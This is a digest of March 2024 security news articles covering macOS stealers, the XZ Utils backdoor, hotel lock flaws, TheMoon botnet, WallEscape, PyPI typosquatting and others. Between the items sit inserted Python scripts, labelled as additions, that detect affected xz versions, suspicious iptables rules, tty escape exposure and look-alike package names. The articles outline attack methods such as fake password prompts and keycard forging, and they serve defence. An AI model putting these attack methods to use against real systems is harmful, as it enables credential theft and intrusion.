Hackers Target macOS Users with Malicious Ads Spreading Stealer Malware
31.3.24
Virus
The Hacker News
Malicious ads and bogus websites are acting as a conduit to deliver two different stealer malware, including Atomic Stealer, targeting Apple macOS users.
The ongoing infostealer attacks targeting macOS users may have adopted different methods to compromise victims' Macs, but operate with the end goal of stealing sensitive data, Jamf Threat Labs said in a report published Friday.
One such attack chain targets users searching for Arc Browser on search engines like Google to serve bogus ads that redirect users to look-alike sites ("airci[.]net") that serve the malware.
"Interestingly, the malicious website cannot be accessed directly, as it returns an error," security researchers Jaron Bradley, Ferdous Saljooki, and Maggie Zirnhelt said. "It can only be accessed through a generated sponsored link, presumably to evade detection."
The disk image file downloaded from the counterfeit website ("ArcSetup.dmg") delivers Atomic Stealer, which is known to request users to enter their system passwords via a fake prompt and ultimately facilitate information theft.
Jamf said it also discovered a phony website called meethub[.]gg that claims to offer a free group meeting scheduling software, but actually installs another stealer malware capable of harvesting users' keychain data, stored credentials in web browsers, and information from cryptocurrency wallets.
Much like Atomic stealer, the malware – which is said to overlap with a Rust-based stealer family known as Realst – also prompts the user for their macOS login password using an AppleScript call to carry out its malicious actions.
Attacks leveraging this malware are said to have approached victims under the pretext of discussing job opportunities and interviewing them for a podcast, subsequently asking them to download an app from meethub[.]gg to join a video conference provided in the meeting invites.
"These attacks are often focused on those in the crypto industry as such efforts can lead to large payouts for attackers," the researchers said. "Those in the industry should be hyper-aware that it's often easy to find public information that they are asset holders or can easily be tied to a company that puts them in this industry."
The development comes as MacPaw's cybersecurity division Moonlock Lab disclosed that malicious DMG files ("App_v1.0.4.dmg") are being used by threat actors to deploy a stealer malware designed to extract credentials and data from various applications.
This is accomplished by means of an obfuscated AppleScript and bash payload that's retrieved from a Russian IP address, the former of which is used to launch a deceptive prompt (as mentioned above) to trick users into providing the system passwords.
"Disguised as a harmless DMG file, it tricks the user into installation via a phishing image, persuading the user to bypass macOS's Gatekeeper security feature," security researcher Mykhailo Hrebeniuk said.
The development is an indication that macOS environments are increasingly under threat from stealer attacks, with some strains even boasting of sophisticated anti-virtualization techniques by activating a self-destructing kill switch to evade detection.
In recent weeks, malvertising campaigns have also been observed pushing the FakeBat loader (aka EugenLoader) and other information stealers like Rhadamanthys via a Go-based loader through decoy sites for popular software such as Notion and PuTTY.
Urgent: Secret Backdoor Found in XZ Utils Library, Impacts Major Linux Distros
30.3.24
Virus
The Hacker News
RedHat on Friday released an "urgent security alert" warning that two versions of a popular data compression library called XZ Utils (previously LZMA Utils) have been backdoored with malicious code designed to allow unauthorized remote access.
The software supply chain compromise, tracked as CVE-2024-3094, has a CVSS score of 10.0, indicating maximum severity. It impacts XZ Utils versions 5.6.0 (released February 24) and 5.6.1 (released March 9).
"Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code," the IBM subsidiary said in an advisory.
"This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library."
Specifically, the nefarious code baked into the code is designed to interfere with the sshd daemon process for SSH (Secure Shell) via the systemd software suite, and potentially enable a threat actor to break sshd authentication and gain unauthorized access to the system remotely "under the right circumstances."
Microsoft security researcher Andres Freund has been credited with discovering and reporting the issue on Friday. The heavily obfuscated malicious code is said to have been introduced over a series of four commits to the Tukaani Project on GitHub by a user named JiaT75.
"Given the activity over several weeks, the committer is either directly involved or there was some quite severe compromise of their system," Freund said. "Unfortunately the latter looks like the less likely explanation, given they communicated on various lists about the 'fixes.'"
Microsoft-owned GitHub has since disabled the XZ Utils repository maintained by the Tukaani Project "due to a violation of GitHub's terms of service." There are currently no reports of active exploitation in the wild.
Evidence shows that the packages are only present in Fedora 41 and Fedora Rawhide, and do not impact Red Hat Enterprise Linux (RHEL), Debian Stable, Amazon Linux, and SUSE Linux Enterprise and Leap.
Out of an abundance of caution, Fedora Linux 40 users have been recommended to downgrade to a 5.4 build. Some of the other Linux distributions impacted by the supply chain attack are below -
Kali Linux (between March 26 and 29)
openSUSE Tumbleweed and openSUSE MicroOS (between March 7 and 28)
Debian testing, unstable, and experimental versions (from 5.5.1alpha-0.1 to 5.6.1-1)
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert of its own, urging users to downgrade XZ Utils to an uncompromised version (e.g., XZ Utils 5.4.6 Stable).
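As an added illustration, not part of the Red Hat, CISA or Hacker News material above, the following Python snippet shows the check an administrator would run in response to this alert: parse the output of `xz --version`, flag the two releases the advisory names (5.6.0 and 5.6.1), and confirm whether the local sshd binary loads liblzma at all, since the advisory ties the payload to sshd via that library. It assumes the standard two-line `xz --version` output, a Linux host with `ldd`, and `/usr/sbin/sshd` as a fallback path; the version strings in the usage comments are constructed.

```python
import re
import shutil
import subprocess

# The two releases Red Hat's alert names as backdoored (CVE-2024-3094).
BACKDOORED_XZ_VERSIONS = {"5.6.0", "5.6.1"}

# `xz --version` prints two lines, for example (constructed sample):
#   xz (XZ Utils) 5.4.6
#   liblzma 5.4.6
_VERSION_RE = re.compile(r"^(xz \(XZ Utils\)|liblzma)\s+(\d+\.\d+\.\d+)", re.MULTILINE)


def parse_xz_version_output(output: str) -> dict:
    """Extract the xz and liblzma versions from `xz --version` output."""
    found = {}
    for match in _VERSION_RE.finditer(output):
        key = "xz" if match.group(1).startswith("xz") else "liblzma"
        found[key] = match.group(2)
    return found


def is_backdoored_version(version: str) -> bool:
    """True only for the versions the advisory lists; 5.4.x builds are the recommended fallback."""
    return version.strip() in BACKDOORED_XZ_VERSIONS


def assess(output: str) -> dict:
    """Summarise `xz --version` output: which versions were seen and whether any is affected."""
    versions = parse_xz_version_output(output)
    return {
        "versions": versions,
        "affected": any(is_backdoored_version(v) for v in versions.values()),
    }


def check_local_xz():
    """Run the check against this host; returns None when xz is not installed."""
    if shutil.which("xz") is None:
        return None
    proc = subprocess.run(["xz", "--version"], capture_output=True, text=True, check=False)
    return assess(proc.stdout)


def sshd_links_liblzma() -> bool:
    """Linux-only helper: does the sshd binary load liblzma according to `ldd`?

    The advisory describes the payload as tampering with sshd through the modified
    library, so a negative answer lowers the urgency even when an affected version
    is installed. The /usr/sbin/sshd fallback path is an assumption.
    """
    sshd = shutil.which("sshd") or "/usr/sbin/sshd"
    if shutil.which("ldd") is None:
        return False
    proc = subprocess.run(["ldd", sshd], capture_output=True, text=True, check=False)
    return "liblzma" in proc.stdout


if __name__ == "__main__":
    result = check_local_xz()
    if result is None:
        print("xz is not installed on this host")
    else:
        print(result, "| sshd links liblzma:", sshd_links_liblzma())
```

Run it on each host in an inventory; an `affected` result together with `sshd links liblzma: True` is the combination that warrants the downgrade CISA recommends, whereas a non-linked sshd still merits the downgrade but is not the remote-access path the advisory describes.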
Dormakaba Locks Used in Millions of Hotel Rooms Could Be Cracked in Seconds
30.3.24
Hacking
The Hacker News
Security vulnerabilities discovered in Dormakaba's Saflok electronic RFID locks used in hotels could be weaponized by threat actors to forge keycards and stealthily slip into locked rooms.
The shortcomings have been collectively named Unsaflok by researchers Lennert Wouters, Ian Carroll, rqu, BusesCanFly, Sam Curry, sshell, and Will Caruana. They were reported to the Zurich-based company in September 2022.
"When combined, the identified weaknesses allow an attacker to unlock all rooms in a hotel using a single pair of forged keycards," they said.
Full technical specifics about the vulnerabilities have been withheld, considering the potential impact, and are expected to be made public in the future.
The issues impact more than three million hotel locks spread across 13,00 properties in 131 countries. This includes the models Saflok MT, and Quantum, RT, Saffire, and Confidant series devices, which are used in combination with the System 6000, Ambiance, and Community management software.
Dormakaba is estimated to have updated or replaced 36% of the impacted locks as of March 2024 as part of a rollout process that commenced in November 2023. Some of the vulnerable locks have been in use since 1988.
"An attacker only needs to read one keycard from the property to perform the attack against any door in the property," the researchers said. "This keycard can be from their own room, or even an expired keycard taken from the express checkout collection box."
The forged cards can be created using any MIFARE Classic card or any commercially available RFID read-write tools that are capable of writing data to these cards. Alternatively, Proxmark3, Flipper Zero, or even an NFC capable Android phone can be used in place of the cards.
Speaking to WIRED's Andy Greenberg, the researchers said the attack entails reading a certain code from that card and creating a pair of forged keycards using the aforementioned method – one to reprogram the data on the lock and another to open it by cracking Dormakaba's Key Derivation Function (KDF) encryption system.
"Two quick taps and we open the door," Wouters was quoted as saying.
Another crucial step involves reverse engineering the lock programming devices distributed by Dormakaba to hotels and the front desk software for managing keycards, thereby allowing the researchers to spoof a working master key that could be used to unlock any room.
There is currently no confirmed case of exploitation of these issues in the wild, although the researchers don't rule out the possibility that the vulnerabilities have been discovered or used by others.
"It may be possible to detect certain attacks by auditing the lock's entry/exit logs," they added. "Hotel staff can audit this via the HH6 device and look for suspicious entry/exit records. Due to the vulnerability, entry/exit records could be attributed to the wrong keycard or staff member."
The disclosure comes on the back of the discovery of three critical security vulnerabilities in commonly used Electronic Logging Devices (ELDs) in the trucking industry that could be weaponized to enable unauthorized control over vehicle systems and manipulate data and vehicle operations arbitrarily.
Even more concerningly, one of the flaws could pave the way for a self-propagating truck-to-truck worm, potentially leading to widespread disruptions in commercial fleets and leading to severe safety consequences.
TheMoon Botnet Resurfaces, Exploiting EoL Devices to Power Criminal Proxy
30.3.24
BotNet
The Hacker News
A botnet previously considered to be rendered inert has been observed enslaving end-of-life (EoL) small office/home office (SOHO) routers and IoT devices to fuel a criminal proxy service called Faceless.
"TheMoon, which emerged in 2014, has been operating quietly while growing to over 40,000 bots from 88 countries in January and February of 2024," the Black Lotus Labs team at Lumen Technologies said.
Faceless, detailed by security journalist Brian Krebs in April 2023, is a malicious residential proxy service that's offered its anonymity services to other threat actors for a negligible fee that costs less than a dollar per day.
In doing so, it allows the customers to route their malicious traffic through tens of thousands of compromised systems advertised on the service, effectively concealing their true origins.
The Faceless-backed infrastructure has been assessed to be used by operators of malware such as SolarMarker and IcedID to connect to their command-and-control (C2) servers to obfuscate their IP addresses.
That being said, a majority of the bots are used for password spraying and/or data exfiltration, primarily targeting the financial sector, with more than 80% of the infected hosts located in the U.S.
Lumen said it first observed the malicious activity in late 2023, the goal being to breach EoL SOHO routers and IoT devices and deploy an updated version of TheMoon, and ultimately enroll the botnet into Faceless.
The attacks entail dropping a loader that's responsible for fetching an ELF executable from a C2 server. This includes a worm module that spreads itself to other vulnerable servers and another file called ".sox" that's used to proxy traffic from the bot to the internet on behalf of a user.
In addition, the malware configures iptables rules to drop incoming TCP traffic on ports 8080 and 80 and allow traffic from three different IP ranges. It also attempts to contact an NTP server from a list of legitimate NTP servers in a likely effort to determine if the infected device has internet connectivity and it is not being run in a sandbox.
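The firewall changes described above are something a defender can look for on a device that still allows shell access. The following Python script is an added example, not code from Lumen or the article: it parses `iptables -S` style output and flags the pattern of DROP rules on TCP ports 80 and 8080 combined with source-scoped ACCEPT rules on the INPUT chain. The sample rules are constructed, and the three source ranges are RFC 5737 documentation addresses rather than the real ranges, which the article does not list; treat a match as a lead for investigation, not proof of infection.

```python
import shlex

# Constructed sample of `iptables -S` output shaped like the behaviour the article
# describes; the /24 sources are documentation ranges, not real indicators.
SAMPLE_RULES = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -s 192.0.2.0/24 -j ACCEPT
-A INPUT -s 198.51.100.0/24 -j ACCEPT
-A INPUT -s 203.0.113.0/24 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 8080 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
"""

# Ports the article says the malware blocks inbound.
WATCHED_PORTS = {"80", "8080"}


def parse_rule(line):
    """Turn one `-A CHAIN ...` line into a dict of the options this check cares about."""
    tokens = shlex.split(line)
    if len(tokens) < 2 or tokens[0] != "-A":
        return None  # policy lines (-P) and blanks are skipped
    rule = {"chain": tokens[1], "src": None, "dport": None, "target": None, "raw": line}
    for i, tok in enumerate(tokens[2:], start=2):
        if i + 1 >= len(tokens):
            break
        if tok == "-s":
            rule["src"] = tokens[i + 1]
        elif tok == "--dport":
            rule["dport"] = tokens[i + 1]
        elif tok == "-j":
            rule["target"] = tokens[i + 1]
    return rule


def flag_suspicious_rules(text):
    """Return INPUT-chain DROPs on the watched ports and source-only ACCEPTs,
    plus a boolean saying whether the whole pattern is present."""
    drops, allows = [], []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None or rule["chain"] != "INPUT":
            continue
        if rule["target"] == "DROP" and rule["dport"] in WATCHED_PORTS:
            drops.append(rule)
        elif rule["target"] == "ACCEPT" and rule["src"] and rule["dport"] is None:
            allows.append(rule)
    blocked_ports = {r["dport"] for r in drops}
    return {
        "drops": drops,
        "allows": allows,
        "matches_pattern": blocked_ports == WATCHED_PORTS and len(allows) >= 1,
    }


if __name__ == "__main__":
    report = flag_suspicious_rules(SAMPLE_RULES)
    for r in report["drops"] + report["allows"]:
        print("suspicious:", r["raw"])
    print("pattern present:", report["matches_pattern"])
```

On a real device, feed it the output of `iptables -S` collected over the vendor's shell or a configuration backup; the same parser works for `ip6tables -S`.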
The targeting of EoL appliances to fabricate the botnet is no coincidence, as they are no longer supported by the manufacturer and become susceptible to security vulnerabilities over time. It's also possible that the devices are infiltrated by means of brute-force attacks.
Additional analysis of the proxy network has revealed that more than 30% of the infections lasted for over 50 days, while about 15% of the devices were part of the network for 48 hours or less.
"Faceless has become a formidable proxy service that rose from the ashes of the 'iSocks' anonymity service and has become an integral tool for cyber criminals in obfuscating their activity," the company said. "TheMoon is the primary, if not the only, supplier of bots to the Faceless proxy service."
New Linux Bug Could Lead to User Password Leaks and Clipboard Hijacking
30.3.24
Hacking
The Hacker News
Details have emerged about a vulnerability impacting the "wall" command of the util-linux package that could be potentially exploited by a bad actor to leak a user's password or alter the clipboard on certain Linux distributions.
The bug, tracked as CVE-2024-28085, has been codenamed WallEscape by security researcher Skyler Ferrante. It has been described as a case of improper neutralization of escape sequences.
"The util-linux wall command does not filter escape sequences from command line arguments," Ferrante said. "This allows unprivileged users to put arbitrary text on other users' terminals, if mesg is set to "y" and wall is setgid."
The vulnerability was introduced as part of a commit made in August 2013.
The "wall" command is used to write a message to the terminals of all users that are currently logged in to a server, essentially allowing users with elevated permissions to broadcast key information to all local users (e.g., a system shutdown).
"wall displays a message, or the contents of a file, or otherwise its standard input, on the terminals of all currently logged in users," the man page for the Linux command reads. "Only the superuser can write on the terminals of users who have chosen to deny messages or are using a program which automatically denies messages."
CVE-2024-28085 essentially exploits improperly filtered escape sequences provided via command line arguments to trick users into creating a fake sudo (aka superuser do) prompt on other users' terminals and trick them into entering their passwords.
However, for this to work, the mesg utility – which controls the ability to display messages from other users – has to be set to "y" (i.e., enabled) and the wall command has to have setgid permissions.
CVE-2024-28085 impacts Ubuntu 22.04 and Debian Bookworm as these two criteria are met. On the other hand, CentOS is not vulnerable since the wall command does not have setgid.
"On Ubuntu 22.04, we have enough control to leak a user's password by default," Ferrante said. "The only indication of attack to the user will be an incorrect password prompt when they correctly type their password, along with their password being in their command history."
Similarly, on systems that allow wall messages to be sent, an attacker could potentially alter a user's clipboard through escape sequences on select terminals like Windows Terminal. It does not work on GNOME Terminal.
Users are advised to update to util-linux version 2.40 to mitigate against the flaw.
"[CVE-2024-28085] allows unprivileged users to put arbitrary text on other users terminals, if mesg is set to y and *wall is setgid*," according to the release notes. "Not all distros are affected (e.g., CentOS, RHEL, Fedora are not; Ubuntu and Debian wall is both setgid and mesg is set to y by default)."
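To make the two preconditions concrete and show what "neutralizing escape sequences" means in practice, here is an added Python example (not util-linux code and not the fix that shipped in 2.40). `conditions_from_modes` evaluates the pair the release notes name, a setgid `wall` binary and a tty that accepts messages (`mesg y` sets the group-write bit on the tty device), and `neutralize_escapes` rewrites a message so that control characters, including ESC, reach the terminal as visible caret notation rather than being interpreted. The `/usr/bin/wall` path and the caret-notation style are assumptions for illustration.

```python
import os
import stat
from typing import Optional


def neutralize_escapes(message: str) -> str:
    """Rewrite a message so no control character reaches the terminal uninterpreted.

    C0 controls (including ESC, 0x1b) become caret notation (^[), DEL becomes ^?,
    and C1 controls (0x80-0x9f, also honoured by some terminals) become \\xNN.
    Newline and tab are kept because wall messages are multi-line text.
    """
    out = []
    for ch in message:
        code = ord(ch)
        if ch in "\n\t":
            out.append(ch)
        elif code < 0x20:
            out.append("^" + chr(code + 0x40))  # ESC -> ^[ , BEL -> ^G
        elif code == 0x7F:
            out.append("^?")
        elif 0x80 <= code <= 0x9F:
            out.append("\\x%02x" % code)
        else:
            out.append(ch)
    return "".join(out)


def conditions_from_modes(wall_mode: int, tty_mode: int) -> bool:
    """The two preconditions from the release notes, checked on st_mode values:
    wall carries the setgid bit and the target tty is group-writable (mesg y)."""
    return bool(wall_mode & stat.S_ISGID) and bool(tty_mode & stat.S_IWGRP)


def host_is_exposed(wall_path: str = "/usr/bin/wall", tty_path: Optional[str] = None) -> bool:
    """Evaluate the preconditions on this host; tty_path defaults to the controlling tty.
    Returns False when either file cannot be examined."""
    try:
        wall_mode = os.stat(wall_path).st_mode
        if tty_path is None:
            tty_path = os.ttyname(0)
        tty_mode = os.stat(tty_path).st_mode
    except OSError:
        return False
    return conditions_from_modes(wall_mode, tty_mode)


if __name__ == "__main__":
    # Constructed message carrying a clear-screen sequence, as a fake prompt might.
    sample = "[sudo] password for user: \x1b[2J"
    print(repr(neutralize_escapes(sample)))
    print("preconditions met on this host:", host_is_exposed())
```

Until util-linux 2.40 is installed, `mesg n` clears the group-write bit on a user's tty and is the per-user mitigation the preconditions imply.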
The disclosure comes as security researcher notselwyn detailed a use-after-free vulnerability in the netfilter subsystem in the Linux kernel that could be exploited to achieve local privilege escalation.
Assigned the CVE identifier CVE-2024-1086 (CVSS score: 7.8), the underlying issue stems from input sanitization failure of netfilter verdicts, allowing a local attacker to cause a denial-of-service (DoS) condition or possibly execute arbitrary code. It has been addressed in a commit pushed on January 24, 2024.
PyPI Halts Sign-Ups Amid Surge of Malicious Package Uploads Targeting Developers
29.3.24
Hacking
The Hacker News
The maintainers of the Python Package Index (PyPI) repository briefly suspended new user sign-ups following an influx of malicious projects uploaded as part of a typosquatting campaign.
PyPI said "new project creation and new user registration" was temporarily halted to mitigate what it described as a "malware upload campaign." The incident was resolved 10 hours later, on March 28, 2024, at 12:56 p.m. UTC.
Software supply chain security firm Checkmarx said the unidentified threat actors behind flooding the repository targeted developers with typosquatted versions of popular packages.
"This is a multi-stage attack and the malicious payload aimed to steal crypto wallets, sensitive data from browsers (cookies, extensions data, etc.), and various credentials," researchers Yehuda Gelb, Jossef Harush Kadouri, and Tzachi Zornstain said. "In addition, the malicious payload employed a persistence mechanism to survive reboots."
The findings were also corroborated independently by Mend.io, which noted that it detected more than 100 malicious packages targeting machine learning (ML) libraries such as Pytorch, Matplotlib, and Selenium.
The development comes as open-source repositories are increasingly becoming an attack vector for threat actors to infiltrate enterprise environments.
Typosquatting is a well-documented attack technique in which adversaries upload packages with names closely resembling their legitimate counterparts (e.g., Matplotlib vs. Matplotlig or tensorflow vs. tensourflow) in order to trick unsuspecting users into downloading them.
These deceptive variants – totalling over 500 packages, per Check Point – have been found to be uploaded from a unique account starting March 26, 2024, suggesting that the whole process was automated.
"The decentralized nature of the uploads, with each package attributed to a different user, complicates efforts to cross-identify these malicious entries," the Israeli cybersecurity company said.
Cybersecurity firm Phylum, which has also been tracking the same campaign, said the attackers published -
67 variations of requirements
38 variations of Matplotlib
36 variations of requests
35 variations of colorama
29 variations of tensorflow
28 variations of selenium
26 variations of BeautifulSoup
26 variations of PyTorch
20 variations of pillow
15 variations of asyncio
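The names in Phylum's tally above are exactly what a typosquat screen compares against. The following Python example is added here and is not code from Phylum, Checkmarx or PyPI: it normalises package names the way PyPI does (PEP 503), computes the edit distance to a list of popular packages, and screens a requirements file for names that sit within two edits of a popular one without being it. The popular-package list is taken from the tally above and the requirement lines are constructed; the two-edit threshold is a tuning choice, not a published rule.

```python
import re

# Names from the Phylum tally above, lowercased as PyPI compares them.
POPULAR_PACKAGES = {
    "requirements", "matplotlib", "requests", "colorama", "tensorflow",
    "selenium", "beautifulsoup", "pytorch", "pillow", "asyncio",
}


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_typosquat_target(name, popular=POPULAR_PACKAGES, max_distance=2):
    """Return (popular_name, distance) when `name` is within max_distance edits of a
    popular package without being that package; None otherwise."""
    n = normalize(name)
    if n in popular:
        return None  # the genuine package itself
    best = None
    for p in popular:
        d = edit_distance(n, p)
        if d <= max_distance and (best is None or d < best[1]):
            best = (p, d)
    return best


def screen_requirements(lines, popular=POPULAR_PACKAGES):
    """Screen requirement specifiers ('pkg==1.0', 'pkg>=2', 'pkg[extra]') and
    return (requested_name, popular_name, distance) for each suspect."""
    suspects = []
    for line in lines:
        spec = line.strip()
        if not spec or spec.startswith("#"):
            continue
        pkg = re.split(r"[<>=!~\[; ]", spec, maxsplit=1)[0]
        hit = find_typosquat_target(pkg, popular)
        if hit:
            suspects.append((pkg,) + hit)
    return suspects


if __name__ == "__main__":
    # Constructed requirements file using the article's own examples of look-alikes.
    sample = ["requests==2.31.0", "Matplotlig>=3.8", "tensourflow", "# comment", "numpy"]
    for requested, target, dist in screen_requirements(sample):
        print(f"{requested!r} is {dist} edit(s) from popular package {target!r}")
```

In a CI pipeline the same screen can run over the resolved dependency set rather than the top-level file, which also catches a look-alike pulled in transitively.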
The packages, for their part, check if the installer's operating system was Windows, and if so, proceed to download and execute an obfuscated payload retrieved from an actor-controlled domain ("funcaptcha[.]ru").
The malware functions as a stealer, exfiltrating files, Discord tokens, as well as data from web browsers and cryptocurrency wallets to the same server. It further attempts to download a Python script ("hvnc.py") to the Windows Startup folder for persistence.
The development once again illustrates the escalating risk posed by software supply chain attacks, making it crucial that developers scrutinize every third-party component to ensure that it safeguards against potential threats.
This is not the first time PyPI has resorted to such a measure. In May 2023, it temporarily disabled user sign-ups after finding that the "volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion."
PyPI suspended new user registrations a second time last year, on December 27, for similar reasons. The restriction was subsequently lifted on January 2, 2024.
Linux Version of DinodasRAT Spotted in Cyber Attacks Across Several Countries
29.3.24
Virus
The Hacker News
A Linux version of a multi-platform backdoor called DinodasRAT has been detected in the wild targeting China, Taiwan, Turkey, and Uzbekistan, new findings from Kaspersky reveal.
DinodasRAT, also known as XDealer, is a C++-based malware that offers the ability to harvest a wide range of sensitive data from compromised hosts.
In October 2023, Slovak cybersecurity firm ESET revealed that a governmental entity in Guyana has been targeted as part of a cyber espionage campaign dubbed Operation Jacana to deploy the Windows version of the implant.
Then last week, Trend Micro detailed a threat activity cluster it tracks as Earth Krahang and which has shifted to using DinodasRAT since 2023 in its attacks aimed at several government entities worldwide.
The use of DinodasRAT has been attributed to various China-nexus threat actors, including LuoYu, once again reflecting the tool sharing prevalent among hacking crews identified as acting on behalf of the country.
Kaspersky said it discovered a Linux version of the malware (V10) in early October 2023. Evidence gathered so far shows that the first known variant (V7) dates back to 2021.
It's mainly designed to target Red Hat-based distributions and Ubuntu Linux. Upon execution, it establishes persistence on the host by using SystemV or SystemD startup scripts and periodically contacts a remote server over TCP or UDP to fetch the commands to be run.
DinodasRAT is equipped to perform file operations, change command-and-control (C2) addresses, enumerate and terminate running processes, execute shell commands, download a new version of the backdoor, and even uninstall itself.
It also takes steps to evade detection by debugging and monitoring tools, and like its Windows counterpart, utilizes the Tiny Encryption Algorithm (TEA) to encrypt C2 communications.
"DinodasRAT's primary use case is to gain and maintain access via Linux servers rather than reconnaissance," Kaspersky said. "The backdoor is fully functional, granting the operator complete control over the infected machine, enabling data exfiltration and espionage."
Finland Blames Chinese Hacking Group APT31 for Parliament Cyber Attack
29.3.24
APT
The Hacker News
The Police of Finland (aka Poliisi) has formally accused a Chinese nation-state actor tracked as APT31 of orchestrating a cyber attack targeting the country's Parliament in 2020.
The intrusion, per the authorities, is said to have occurred between fall 2020 and early 2021. The agency described the ongoing criminal probe as both demanding and time-consuming, involving extensive analysis of a "complex criminal infrastructure."
The breach was first disclosed in December 2020, with the Finnish Security and Intelligence Service (Supo) describing it as a state-backed cyber espionage operation designed to penetrate the Parliament's information systems.
"The police have previously informed that they are investigating the hacking group APT31's connections with the incident," Poliisi said. "These connections have now been confirmed by the investigation, and the police have also identified one suspect."
APT31, also called Altaire, Bronze Vinewood, Judgement Panda, and Violet Typhoon (formerly Zirconium), is a Chinese state-backed group that has been active since at least 2010.
Earlier this week, the U.K. and the U.S. blamed the adversarial collective for engaging in a widespread cyber espionage campaign targeting businesses, government officials, dissidents, and politicians.
Seven operatives associated with the group have been charged in the U.S. for their involvement in the hacking spree. Two of them – Ni Gaobin and Zhao Guangzong – have been sanctioned by the two nations, alongside a company named Wuhan XRZ, which allegedly served as a cover for orchestrating cyber attacks against critical infrastructure.
"Guangzong is a Chinese national who has conducted numerous malicious cyber operations against U.S. victims as a contractor for Wuhan XRZ," the U.S. Treasury said. "Ni Gaobin assisted Zhao Guangzong in many of his most high profile malicious cyber activities while Zhao Guangzong was a contractor at Wuhan XRZ."
In July 2021, the U.S. and its allies implicated APT31 in a widespread campaign exploiting zero-day security flaws in Microsoft Exchange servers with the goal of likely "acquiring personally identifiable information and intellectual property."
China, however, has hit back against the accusations that it's behind the hacking campaign targeting the West. It has accused the Five Eyes (FVEY) alliance of spreading "disinformation about the threats posed by the so-called 'Chinese hackers.'"
"We urge the U.S. and the U.K. to stop politicizing cybersecurity issues, stop smearing China and imposing unilateral sanctions on China, and stop cyberattacks against China," China's Foreign Ministry Spokesperson Lin Jian said. "China will take necessary measures to firmly safeguard its lawful rights and interests."
New ZenHammer Attack Bypasses RowHammer Defenses on AMD CPUs
29.3.24
Attack
The Hacker News
Cybersecurity researchers from ETH Zurich have developed a new variant of the RowHammer DRAM (dynamic random-access memory) attack that, for the first time, successfully works against AMD Zen 2 and Zen 3 systems despite mitigations such as Target Row Refresh (TRR).
"This result proves that AMD systems are equally vulnerable to Rowhammer as Intel systems, which greatly increases the attack surface, considering today's AMD market share of around 36% on x86 desktop CPUs," the researchers said.
The technique has been codenamed ZenHammer, which can also trigger RowHammer bit flips on DDR5 devices for the first time.
RowHammer, first publicly disclosed in 2014, is a well-known attack that exploits DRAM's memory cell architecture to alter data by repeatedly accessing a specific row (aka hammering) to cause the electrical charge of a cell to leak to adjacent cells.
This can induce random bit flips in neighboring memory rows (from 0 to 1, or vice versa), which can alter the memory contents and potentially facilitate privilege escalation, compromising confidentiality, integrity, and availability of a system.
The attacks take advantage of the physical proximity of these cells within the memory array, a problem that's likely to worsen as the DRAM technology scaling continues and the storage density increases.
"As DRAM continues to scale, RowHammer bit flips can occur at smaller activation counts and thus a benign workload's DRAM row activation rates can approach or even exceed the RowHammer threshold," ETH Zurich researchers noted in a paper published in November 2022.
"Thus, a system may experience bit flips or frequently trigger RowHammer defense mechanisms even without a malicious party performing a RowHammer attack in the system, leading to data corruption or significant performance degradation."
One of the crucial mitigations implemented by DRAM manufacturers against RowHammer is TRR, which is an umbrella term used for mechanisms that refresh target rows that are determined to be accessed frequently.
In doing so, the idea is to generate more memory refresh operations so that victim rows will either be refreshed before bits are flipped or be corrected after bits are flipped due to RowHammer attacks.
ZenHammer, like TRRespass and SMASH, bypasses TRR guardrails by reverse engineering the secret DRAM address functions in AMD systems and adopting improved refresh synchronization and scheduling of flushing and fencing instructions to trigger bit flips on seven out of 10 sample Zen 2 devices and six out of 10 Zen 3 devices.
The study also arrived at an optimal hammering instruction sequence to improve row activation rates in order to facilitate more effective hammering.
"Our results showed that regular loads (MOV) with CLFLUSHOPT for flushing aggressors from the cache, issued immediately after accessing an aggressor ('scatter' style), is optimal," the researchers said.
ZenHammer has the distinction of being the very first method that can trigger bit flips on systems equipped with DDR5 chips on AMD's Zen 4 microarchitectural platform. That said, it only works on one of the 10 tested devices (Ryzen 7 7700X).
It's worth noting that DDR5 DRAM modules were previously considered immune to RowHammer attacks owing to them replacing TRR with a new kind of protection called refresh management.
"The changes in DDR5 such as improved RowHammer mitigations, on-die error correction code (ECC), and a higher refresh rate (32 ms) make it harder to trigger bit flip," the researchers said.
"Given the lack of bit flips on nine of 10 DDR5 devices, more work is needed to better understand the potentially new RowHammer mitigations and their security guarantees."
AMD, in a security bulletin, said it's assessing RowHammer bit flips on DDR5 devices, and that it will provide an update following its completion.
"AMD microprocessor products include memory controllers designed to meet industry-standard DDR specifications," it added. "Susceptibility to RowHammer attacks varies based on the DRAM device, vendor, technology, and system settings."
Darcula Phishing Network Leveraging RCS and iMessage to Evade Detection
29.3.24
Phishing
The Hacker News
A sophisticated phishing-as-a-service (PhaaS) platform called Darcula has set its sights on organizations in over 100 countries by leveraging a massive network of more than 20,000 counterfeit domains to help cyber criminals launch attacks at scale.
"Using iMessage and RCS rather than SMS to send text messages has the side effect of bypassing SMS firewalls, which is being used to great effect to target USPS along with postal services and other established organizations in 100+ countries," Netcraft said.
Darcula has been employed in several high-profile phishing attacks over the last year, wherein the smishing messages are sent to both Android and iOS users in the U.K., in addition to those that leverage package delivery lures by impersonating legitimate services like USPS.
A Chinese-language PhaaS, Darcula is advertised on Telegram and offers support for about 200 templates impersonating legitimate brands that customers can avail for a monthly fee to set up phishing sites and carry out their malicious activities.
A majority of the templates are designed to mimic postal services, but they also include public and private utilities, financial institutions, government bodies (e.g., tax departments), airlines, and telecommunication organizations.
